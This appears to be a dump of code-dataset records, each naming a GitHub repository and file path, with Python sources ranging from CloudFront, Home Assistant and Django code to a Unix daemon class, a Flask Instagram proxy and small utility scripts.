aliases = argument.List()
enabled = argument.Boolean(default=True, field="Enabled")
bucket = argument.Resource(
Bucket,
field="DomainName",
serializer=serializers.Format("{0}.s3.amazonaws.com", serializers.Identifier()),
group="s3origin"
)
origin_access_identity = argument.String(default='', field="OriginAccessIdentity", group="s3origin")
logging = argument.Resource(
StreamingLoggingConfig,
default=lambda instance: dict(enabled=False),
field="Logging",
serializer=serializers.Resource(),
)
price_class = argument.String(
default="PriceClass_100",
choices=['PriceClass_100', 'PriceClass_200', 'PriceClass_All'],
field="PriceClass",
)
account = argument.Resource(BaseAccount)
class Describe(SimpleDescribe, Plan):
resource = StreamingDistribution
service_name = 'cloudfront'
describe_filters = {}
describe_action = "list_streaming_distributions"
describe_envelope = 'StreamingDistributionList.Items'
key = 'Id'
def get_describe_filters(self):
return {"Id": self.object['Id']}
def describe_object_matches(self, d):
return self.resource.name == d['Comment'] or self.resource.name in d['Aliases'].get('Items', [])
def describe_object(self):
distribution = super(Describe, self).describe_object()
if distribution:
result = self.client.get_streaming_distribution(Id=distribution['Id'])
distribution = {"ETag": result["ETag"], "Id": distribution["Id"]}
distribution.update(result['StreamingDistribution'])
return distribution
class Apply(SimpleApply, Describe):
create_action = "create_streaming_distribution"
create_response = "not-that-useful"
waiter = "streaming_distribution_deployed"
signature = (
Present("name"),
Present("bucket"),
)
def get_create_serializer(self):
return serializers.Dict(
StreamingDistributionConfig=serializers.Resource(),
)
class Destroy(SimpleDestroy, Describe):
destroy_action = "delete_streaming_distribution"
def get_destroy_serializer(self):
return serializers.Dict(
Id=self.resource_id,
IfMatch=serializers.Property('ETag'),
)
def destroy_object(self):
if not self.object:
return
if self.object['StreamingDistributionConfig'].get('Enabled', False):
yield self.generic_action(
"Disable streaming distribution",
self.client.update_streaming_distribution,
Id=self.object['Id'],
IfMatch=self.object['ETag'],
                StreamingDistributionConfig=serializers.Resource(
Enabled=False,
),
)
        yield self.get_waiter(
["Waiting for streaming distribution to enter disabled state"],
"streaming_distribution_deployed",
)
yield RefreshMetadata(self)
for change in super(Destroy, self).destroy_object():
yield change
class AliasTarget(route53.AliasTarget):
""" Adapts a StreamingDistribution into a AliasTarget """
input = StreamingDistribution
def get_serializer(self, runner, **kwargs):
return serializers.Context(
serializers.Const(self.adapts),
serializers.Dict(
DNSName=serializers.Context(
serializers.Property("DomainName"),
serializers.Expression(lambda r, o: route53._normalize(o)),
),
HostedZoneId="Z2FDTNDATAQYW2",
EvaluateTargetHealth=False,
)
)
|
michaelarnauts/home-assistant
|
homeassistant/components/script.py
|
Python
|
mit
| 5,105
| 0
|
"""
homeassistant.components.script
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scripts are a sequence of actions that can be triggered manually
by the user or automatically based upon automation events, etc.
"""
import logging
from datetime import timedelta
import homeassistant.util.dt as date_util
import threading
from homeassistant.helpers.event import track_point_in_time
from homeassistant.util import split_entity_id
from homeassistant.const import (
STATE_ON, STATE_OFF, SERVICE_TURN_ON, SERVICE_TURN_OFF, EVENT_TIME_CHANGED)
DOMAIN = "script"
DEPENDENCIES = ["group"]
CONF_ALIAS = "alias"
CONF_SERVICE = "execute_service"
CONF_SERVICE_DATA = "service_data"
CONF_SEQUENCE = "sequence"
CONF_DELAY = "delay"
_LOGGER = logging.getLogger(__name__)
def setup(hass, config):
""" Load the scripts from the configuration. """
scripts = []
for name, cfg in config[DOMAIN].items():
if CONF_SEQUENCE not in cfg:
_LOGGER.warn("Missing key 'sequence' for script %s", name)
continue
alias = cfg.get(CONF_ALIAS, name)
entity_id = "{}.{}".format(DOMAIN, name)
script = Script(hass, entity_id, alias, cfg[CONF_SEQUENCE])
hass.services.register(DOMAIN, name, script)
scripts.append(script)
def turn_on(service):
""" Calls a script. """
for entity_id in service.data['entity_id']:
domain, service = split_entity_id(entity_id)
hass.services.call(domain, service, {})
def turn_off(service):
""" Cancels a script. """
for entity_id in service.data['entity_id']:
for script in scripts:
if script.entity_id == entity_id:
script.cancel()
hass.services.register(DOMAIN, SERVICE_TURN_ON, turn_on)
hass.services.register(DOMAIN, SERVICE_TURN_OFF, turn_off)
return True
class Script(object):
# pylint: disable=attribute-defined-outside-init
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-few-public-methods
"""
A script contains a sequence of service calls or configured delays
that are executed in order.
Each script also has a state (on/off) indicating whether the script is
running or not.
"""
def __init__(self, hass, entity_id, alias, sequence):
self.hass = hass
self.alias = alias
self.sequence = sequence
self.entity_id = entity_id
self._lock = threading.Lock()
self._reset()
def cancel(self):
""" Cancels a running script and resets the state back to off. """
_LOGGER.info("Cancelled script %s", self.alias)
with self._lock:
if self.listener:
self.hass.bus.remove_listener(EVENT_TIME_CHANGED,
self.listener)
self.listener = None
self._reset()
def _reset(self):
""" Resets a script back to default state so that it is ready to
run from the start again. """
self.actions = None
self.listener = None
self.last_action = "Not Running"
self.hass.states.set(self.entity_id, STATE_OFF, {
"friendly_name": self.alias,
"last_action": self.last_action
})
def _execute_until_done(self):
""" Executes a sequence of actions until finished or until a delay
is encountered. If a delay action is encountered, the script
registers itself to be called again in the future, when
_execute_until_done will resume.
        Returns True if finished, False otherwise. """
for action in self.actions:
if CONF_SERVICE in action:
self._call_service(action)
elif CONF_DELAY in action:
delay = timedelta(**action[CONF_DELAY])
point_in_time = date_util.now() + delay
self.listener = track_point_in_time(
self.hass, self, point_in_time)
return False
return True
    def __call__(self, *args, **kwargs):
""" Executes the script. """
_LOGGER.info("Executing script %s", self.alias)
with self._lock:
if self.actions is None:
self.actions = (action for action in self.sequence)
if not self._execute_until_done():
state = self.hass.states.get(self.entity_id)
state.attributes['last_action'] = self.last_action
self.hass.states.set(self.entity_id, STATE_ON,
state.attributes)
else:
self._reset()
def _call_service(self, action):
""" Calls the service specified in the action. """
self.last_action = action.get(CONF_ALIAS, action[CONF_SERVICE])
_LOGGER.info("Executing script %s step %s", self.alias,
self.last_action)
domain, service = split_entity_id(action[CONF_SERVICE])
data = action.get(CONF_SERVICE_DATA, {})
self.hass.services.call(domain, service, data)
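# Illustrative sketch (an assumption, not part of the original file): the shape
# of configuration that setup() above expects, built from the CONF_* keys it
# reads. Entity ids and timings here are invented for the example.
EXAMPLE_SCRIPT_CONFIG = {
    'script': {
        'wakeup': {
            'alias': 'Wake up',
            'sequence': [
                {'execute_service': 'light.turn_on',
                 'service_data': {'entity_id': 'light.bedroom'}},
                {'delay': {'minutes': 5}},
                {'execute_service': 'light.turn_off',
                 'service_data': {'entity_id': 'light.bedroom'}},
            ],
        },
    },
}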
|
m-lab/operator
|
plsync/sites.py
|
Python
|
apache-2.0
| 25,116
| 0.01067
|
#!/usr/bin/python
from planetlab.model import *
from users import user_list
# NOTE: The legacy network remap is used to re-order the automatically
# generated, sequential list of ipaddresses to a legacy order to preserve
# pre-existing slice-and-IP assignments. Otherwise, slices would be assigned
# to new IPs, and for now, we wish to preserve the slice-node-ip mapping.
# An appropriate time to remove this and re-assign IPs to slices would be
# after a major update & reinstallation, such as LXC kernel update.
legacy_network_remap = {}
Network.legacy_network_remap = legacy_network_remap
# name : site prefix, used to generate PL site name, hostnames, etc
# net : v4 & v6 network prefixes and definitions.
# The "arch" parameter of makesite() is a facility that PLC uses to pass the
# correct kernel arguments when booting nodes at a given site. Currently defined
# "arch" values are:
#
# i386 - none
# x86_64 - "noapic acpi=off"
# x86_64-r420 - "pci=nobios acpi=off"
# x86_64-r630 - none
site_list = [
makesite('akl01','163.7.129.0', '2404:138:4009::', 'Auckland', 'NZ', -36.850000, 174.783000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('ams03','80.239.169.0', '2001:2030:32::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('ams04','77.67.114.64', '2001:668:1f:5f::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('ams05','195.89.145.0', '2001:5002:100:21::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('ams08','213.244.128.128','2001:4c08:2003:2::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
    makesite('arn02','195.89.146.192', '2001:5012:100:24::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('arn03','213.242.86.64', '2001:4c08:2003:44::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('arn04','62.115.225.128', '2001:2030:0:38::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
    makesite('arn05','77.67.119.64', '2001:668:1f:6a::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('ath03','193.201.166.128', '2001:648:25e0::', 'Athens', 'GR', 37.936400, 23.944400, user_list, count=4, arch='x86_64-r630', v6gw='2001:648:25e0::129', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('atl02','38.112.151.64', '2001:550:5b00:1::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('atl03','64.86.200.192', '2001:5a0:3b02::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('atl04','173.205.0.192', '2001:668:1f:1c::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('atl07','209.170.91.128', '2001:2030:0:42::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('atl08','4.71.254.128', '2001:1900:3001:c::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bcn01','91.213.30.192', '2001:67c:137c:5::', 'Barcelona', 'ES', 41.297445, 2.081105, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('beg01','188.120.127.0', '2001:7f8:1e:6::', 'Belgrade', 'RS', 44.821600, 20.292100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bom01','125.18.112.64', '2404:a800:2000:217::', 'Mumbai', 'IN', 19.088611, 72.868056, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bom02','14.143.58.128', '2403:0:100:66::', 'Mumbai', 'IN', 19.088611, 72.868056, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bru01','195.89.146.128', '2001:5005:200::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bru02','212.3.248.192', '2001:4c08:2003:45::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bru03','62.115.229.192', '2001:2030:0:39::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bru04','77.67.119.0', '2001:668:1f:69::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('cpt01','154.114.19.64', '2001:4200:0:e::', 'Cape_Town', 'ZA', -33.972387,18.601803, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('den02','4.34.58.0', '2001:1900:2200:49::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('den04','128.177.109.64', '2001:438:fffd:2c::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('den05','209.170.120.64', '2001:2030:0:3b::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dfw02','64.86.132.64', '2001:5a0:3f00::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dfw03','4.15.35.128', '2001:1900:2200:44::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dfw05','128.177.163.64', '2001:438:fffd:30::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dfw07','209.170.119.128','2001:2030:0:1f::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dfw08','38.107.216.0', '2001:550:2000::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dub01','193.1.12.192', '2001:770:b5::', 'Dublin', 'IE', 53.433300, -6.250000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('fln01','200.237.203.0', '2801:80:a88:4006::', 'Florianopolis', 'BR', -27.668455, -48.545998, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('fra01','80.239.199.0', '2001:2030:2f::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('fra02','77.67.114.0', '2001:668:1f:5e::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('fra03','195.89.146.64', '2001:5001:200:30::', 'Fr
|
inuyasha2012/pypsy
|
demo/demo_grm.py
|
Python
|
mit
| 220
| 0
|
# coding=utf-8
# Graded response model (GRM) in item response theory
from __future__ import division, print_function, unicode_literals
from psy import Grm, data
scores = data['lsat.dat']
grm = Grm(scores=scores)
print(grm.em())
|
feigaochn/leetcode
|
p435_non_overlapping_intervals.py
|
Python
|
mit
| 823
| 0
|
# Definition for an interval.
class Interval:
def __init__(self, s=0, e=0):
self.start = s
self.end = e
class Solution:
def eraseOverlapIntervals(self, intervals):
"""
:type intervals: List[Interval]
:rtype: int
"""
if not intervals:
            return 0
|
intervals.sort(key=lambda i: (i.end, i.start))
kicks = 0
pre_end = intervals[0].end
for it in intervals[1:]:
if it.start < pre_end:
kicks += 1
else:
pre_end = it.end
return kicks
fn = Solution().eraseOverlapIntervals
print(fn([Interval(*it) for it in [[1, 2], [2, 3], [3, 4], [1, 3]]]))
print(fn([Interval(*it) for it in [[1, 2], [1, 2], [1, 2]]]))
print(fn([Interval(*it) for it in [[1, 2], [2, 3]]]))
|
pythonkr/pyconkr-2014
|
pyconkr/forms.py
|
Python
|
mit
| 1,760
| 0
|
from django import forms
from django.utils.translation import ugettext_lazy as _
from django_summernote.widgets import SummernoteInplaceWidget
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from .models import Speaker, Program
class EmailLoginForm(forms.Form):
    email = forms.EmailField(
max_length=255,
label='',
widget=forms.TextInput(attrs={
'placeholder': 'Email address',
'class': 'form-control',
})
)
def clean(self):
cleaned_data = super(EmailLoginForm, self).clean()
return cleaned_data
class SpeakerForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(SpeakerForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.add_input(Submit('submit', _('Submit')))
class Meta:
model = Speaker
fields = ('desc', 'info', )
widgets = {
'desc': SummernoteInplaceWidget(),
}
labels = {
'desc': _('Profile'),
'info': _('Additional information'),
}
class ProgramForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ProgramForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.add_input(Submit('submit', _('Submit')))
class Meta:
model = Program
fields = ('slide_url', 'video_url', 'is_recordable', 'desc', )
widgets = {
'desc': SummernoteInplaceWidget(),
}
labels = {
'slide_url': _('Slide URL'),
'video_url': _('Video URL'),
'is_recordable': _('Photography and recording is allowed'),
'desc': _('Description'),
}
|
dana-i2cat/felix
|
expedient/src/python/plugins/vt_plugin/models/VtPlugin.py
|
Python
|
apache-2.0
| 3,112
| 0.008676
|
from django.db import models
from django.core.exceptions import MultipleObjectsReturned
from expedient.clearinghouse.aggregate.models import Aggregate
from expedient.common.permissions.shortcuts import must_have_permission
from vt_plugin.models.VM import VM
# Virtualization Plugin class
class VtPlugin(Aggregate):
'''
Virtualization Plugin that communicates the Virtualization Aggregate Manager with Expedient
'''
# VT Aggregate information field
information = "An aggregate of VT servers "
class Meta:
app_label = 'vt_plugin'
verbose_name = "Virtualization Aggregate"
client = models.OneToOneField('xmlrpcServerProxy', editable = False, blank = True, null = True)
#def start_slice(self, slice):
# super(VtPlugin, self).start_slice(slice)
# try:
# from vt_plugin.controller.dispatchers.GUIdispatcher import startStopSlice
# startStopSlice("start",slice.uuid)
# except:
# raise
def stop_slice(self, slice):
super(VtPlugin, self).stop_slice(slice)
try:
from vt_plugin.controller.dispatchers.GUIdispatcher import startStopSlice
startStopSlice("stop",slice.uuid)
except:
raise
"""
aggregate.remove_from_project on a VT AM will get here first to check
that no slice inside the project contains VMs for the given aggregate
"""
def remove_from_project(self, project, next):
# Check permission because it won't always call parent method (where permission checks)
must_have_permission("user", self.as_leaf_class(), "can_use_aggregate")
vms = self.resource_set.filter_for_class(VM).filter(vm__projectId=project.uuid)
offending_slices = []
for vm in vms:
offending_slices.append(str(vm.vm.getSliceName()))
# Aggregate has VMs in slices -> stop slices and remove aggregate from there where possible
if offending_slices:
for slice in project.slice_set.all():
try:
self.stop_slice(slice)
self.remove_from_slice(slice, next)
except:
pass
raise MultipleObjectsReturned("Please delete all VMs inside aggregate '%s' before removing it from slices %s" % (self.name, str(offending_slices)))
# Aggregate has no VMs in slices (OK) -> delete completely from project (parent method)
else:
            return super(VtPlugin, self).remove_from_project(project, next)
"""
aggregate.remove_from_slice on a VT AM will get here first to check
that the slice does not contain VMs for the given aggregate
"""
def remove_from_slice(self, slice, next):
# If any VM (created inside this slice) is found inside any server of the VT AM, warn
if self.resource_set.filter_for_class(VM).filter(vm__sliceId=slice.uuid):
raise MultipleObjectsReturned("Please delete all VMs inside aggregate '%s' before removing it" % str(self.name))
return super(VtPlugin, self).remove_from_slice(slice, next)
|
brandonheller/mediawiki_to_gollum
|
split_by_headers.py
|
Python
|
bsd-3-clause
| 2,218
| 0.002705
|
#!/usr/bin/env python
"""Script to split a large mediawiki file into multiple files, by header."""
import sys
import re
import os
ADD_TOC = True # Add TOC everywhere?
def usage():
print "Usage: [scriptname] [infilename]"
if len(sys.argv) != 2:
usage()
exit()
filename_in = sys.argv[1]
if '.' in filename_in:
filename_no_exts = filename_in[:filename_in.find('.')]
else:
filename_no_exts = filename_in
# Match top-level headers only.
header = re.compile(r"^=([^=]+)=")
current_filename = '' # Set once we see a header, hyphenated
current_filename_orig = ''  # Original.
current_text = '' # Build up the next file to write.
file_in = open(filename_in, 'r')
header_names = [] # list of (hyphenated, orig) file name pairs
TOC_FILE = 'Home.mediawiki' # location of intro text before headers + TOC.
def cap_firsts(s):
s_caps = ''
words = s.split(' ')
for j, word in enumerate(words):
words[j] = word[0].upper() + word[1:]
return " ".jo
|
in(words)
first = True
i = 0
for line in file_in.readlines():
m = header.match(line)
if m:
assert len(m.groups()) == 1
# dump string to file.
if first:
filename = TOC_FILE
first = False
else:
filename = current_filename + '.mediawiki'
f = open(filename, 'w')
if ADD_TOC and not filename == TOC_FILE:
f.write("__TOC__\n\n")
f.write(current_text)
f.close()
current_text = ''
# Who knows how Gollum/Mediawiki handle spaces. Convert to hyphens.
current_filename_orig = cap_firsts(m.groups()[0].strip())
current_filename = current_filename_orig.replace(' ', '-')
header_names.append((current_filename, current_filename_orig))
else:
current_text += line
i += 1
# Finish last file
filename = current_filename + '.mediawiki'
f = open(filename, 'w')
f.write(current_text)
f.close()
print "processed %i lines" % i
home_file = open('Home.mediawiki', 'a')
# Dump out the header names to a Home.ext to form a TOC.
for k, (hyphenated, orig) in enumerate(header_names):
# Link | Page Title
home_file.write("%i: [[%s|%s]]\n\n" % (k + 1, hyphenated, orig))
|
cyrilkyburz/bhwi_proxy
|
bhwi_proxy.py
|
Python
|
mit
| 1,516
| 0.019789
|
from flask import Flask, request, jsonify, abort
import os
import requests
app = Flask(__name__)
app.debug = os.getenv('DEBUG', '') == 'True'
def access_token():
return os.getenv('ACCESS_TOKEN', '')
def check_user_id(user_id):
if user_id not in os.getenv('USER_IDS', ''):
return abort(403)
def check_user_name(user_name):
if user_name not in os.getenv('USER_NAMES', ''):
return abort(403)
def perform_request(path):
r = requests.get(path)
    response = jsonify(r.json(), status=202)
    response.headers.add('Access-Control-Allow-Origin', '*')
return response
def build_recent_images_url(user_id):
return 'https://api.instagram.com/v1/users/' + user_id + '/media/recent/?access_token=' + access_token()
def build_user_profile_url(user_id):
return 'https://api.instagram.com/v1/users/' + user_id + '?access_token=' + access_token()
def build_media_url(user_name):
return 'https://www.instagram.com/' + user_name + '/media/'
@app.route("/recent_images/<path:user_id>")
def recent_images(user_id):
check_user_id(user_id)
return perform_request(build_recent_images_url(user_id))
@app.route("/user_profile/<path:user_id>")
def user_profile(user_id):
check_user_id(user_id)
return perform_request(build_user_profile_url(user_id))
@app.route("/media/<path:user_name>")
def media(user_name):
check_user_name(user_name)
return perform_request(build_media_url(user_name))
@app.route('/healthcheck')
def healthcheck():
return 'WORKING'
if __name__ == "__main__":
app.run()
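# Illustrative usage sketch (an assumption, not part of the original file):
# exercising the proxy without a live server, using Flask's test client.
def _smoke_test():
    client = app.test_client()
    # /healthcheck requires no credentials and should always answer WORKING.
    assert client.get('/healthcheck').data == b'WORKING'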
|
hamgravy/volk-fft
|
python/volk_fft_modtool/cfg.py
|
Python
|
gpl-3.0
| 3,621
| 0.005523
|
#!/usr/bin/env python
#
# Copyright 2013, 2014 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import ConfigParser
import sys
import os
import exceptions
import re
class volk_fft_modtool_config:
def key_val_sub(self, num, stuff, section):
return re.sub('\$' + 'k' + str(num), stuff[num][0], (re.sub('\$' + str(num), stuff[num][1], section[1][num])));
def verify(self):
for i in self.verification:
self.verify_section(i)
def remap(self):
for i in self.remapification:
self.verify_section(i)
def verify_section(self, section):
stuff = self.cfg.items(section[0])
for i in range(len(section[1])):
eval(self.key_val_sub(i, stuff, section))
try:
val = eval(self.key_val_sub(i, stuff, section))
if val == False:
raise exceptions.ValueError
except ValueError:
raise exceptions.ValueError('Verification function returns False... key:%s, val:%s'%(stuff[i][0], stuff[i][1]))
except:
raise exceptions.IOError('bad configuration... key:%s, val:%s'%(stuff[i][0], stuff[i][1]))
def __init__(self, cfg=None):
self.config_name = 'config'
self.config_defaults = ['name', 'destination', 'base']
self.config_defaults_remap = ['1',
'self.cfg.set(self.config_name, \'$k1\', os.path.realpath(os.path.expanduser(\'$1\')))',
'self.cfg.set(self.config_name, \'$k2\', os.path.realpath(os.path.expanduser(\'$2\')))']
self.config_defaults_verify = ['re.match(\'[a-zA-Z0-9]+$\', \'$0\')',
            'os.path.exists(\'$1\')',
'os.path.exists(\'$2\')']
        self.remapification = [(self.config_name, self.config_defaults_remap)]
self.verification = [(self.config_name, self.config_defaults_verify)]
default = os.path.join(os.getcwd(), 'volk_fft_modtool.cfg')
icfg = ConfigParser.RawConfigParser()
if cfg:
icfg.read(cfg)
elif os.path.exists(default):
icfg.read(default)
else:
print "Initializing config file..."
icfg.add_section(self.config_name)
for kn in self.config_defaults:
rv = raw_input("%s: "%(kn))
icfg.set(self.config_name, kn, rv)
self.cfg = icfg
self.remap()
self.verify()
def read_map(self, name, inp):
if self.cfg.has_section(name):
self.cfg.remove_section(name)
self.cfg.add_section(name)
for i in inp:
self.cfg.set(name, i, inp[i])
def get_map(self, name):
retval = {}
stuff = self.cfg.items(name)
for i in stuff:
retval[i[0]] = i[1]
return retval
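# Illustrative sketch (an assumption, not part of the original file): the
# on-disk volk_fft_modtool.cfg this class reads, holding the three keys it
# prompts for above ('name' must be alphanumeric, the two paths must exist).
#
# [config]
# name = myoot
# destination = /home/user/modules
# base = /home/user/volk_fft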
|
marshallflax/NVDARemoteServer
|
daemon.py
|
Python
|
gpl-2.0
| 3,540
| 0.051695
|
import sys, os, time, atexit
from signal import SIGTERM, SIGKILL
class Daemon:
"""
A generic daemon class.
Usage: subclass the Daemon class and override the run() method
"""
def __init__(self, pidfile, stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.pidfile = pidfile
def daemonize(self):
"""
do the UNIX double-fork magic, see Stevens' "Advanced
Programming in the UNIX Environment" for details (ISBN 0201563177)
http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
"""
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir("/")
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = file(self.stdin, 'r')
so = file(self.stdout, 'a+')
se = file(self.stderr, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# write pidfile
atexit.register(self.delpid)
pid = str(os.getpid())
file(self.pidfile,'w+').write("%s\n" % pid)
def delpid(self):
os.remove(self.pidfile)
def start(self):
"""
Start the daemon
"""
# Check for a pidfile to see if the daemon already runs
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if pid:
message = "pidfile %s already exist. Daemon already running?\n"
sys.stderr.write(message % self.pidfile)
sys.exit(1)
        # Start the daemon
self.daemonize()
self.run()
def stop(self):
"""
Stop the daemon
"""
# Get the pid from the pidfile
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if not pid:
message = "pidfile %s does not exist. Daemon not running?\n"
            sys.stderr.write(message % self.pidfile)
return # not an error in a restart
# Try killing the daemon process
try:
while 1:
os.kill(pid, SIGTERM)
time.sleep(0.1)
except OSError, err:
err = str(err)
if err.find("No such process") > 0:
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
else:
print str(err)
sys.exit(1)
def kill(self):
"""
Force kill of daemon
"""
# Get the pid from the pidfile
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if not pid:
message = "pidfile %s does not exist. Daemon not running?\n"
sys.stderr.write(message % self.pidfile)
return # not an error in a restart
# Try killing the daemon process
try:
while 1:
os.kill(pid, SIGKILL)
time.sleep(0.1)
except OSError, err:
err = str(err)
if err.find("No such process") > 0:
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
else:
print str(err)
sys.exit(1)
def restart(self):
"""
Restart the daemon
"""
self.stop()
self.start()
def run(self):
"""
You should override this method when you subclass Daemon. It will be called after the process has been
daemonized by start() or restart().
"""
|
prawn-cake/pilvi
|
pilvi/urls.py
|
Python
|
mit
| 762
| 0
|
"""pilvi URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
    1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
]
|
cprogrammer1994/Python-ComputeShader
|
Prepare.py
|
Python
|
gpl-3.0
| 121
| 0.024793
|
import os, shutil
if not os.path.isdir('Bin'):
os.mkdir('Bin')
if not os.path.isdir('Temp'):
    os.mkdir('Temp')
|
toabctl/contrail-sandesh
|
